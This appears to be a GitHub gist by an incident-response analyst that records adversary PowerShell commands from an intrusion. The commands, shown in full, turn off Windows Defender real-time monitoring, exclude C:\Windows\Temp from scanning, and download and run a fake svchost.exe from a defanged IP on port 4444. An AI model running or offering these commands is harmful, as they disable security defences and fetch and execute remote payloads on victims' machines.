Created
February 23, 2024 16:27
-
-
Save Purp1eW0lf/f46e9c45eda038b684c1db2f3122214f to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#adversary excluded directories and neutralised Defender | |
powershell -ep bypass -c \"Set-MpPreference -DisableRealtimeMonitoring $true; | |
Set-MpPreference -ExclusionPath C:\\Windows\\Temp; | |
#then downloaded their file | |
Invoke-WebRequest http://159[.]65[.]130[.]146:4444/svchost.exe -OutFile C:\\Windows\\Temp\\svchost.exe; | |
C:\\Windows\\Temp\\svchost.exe |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment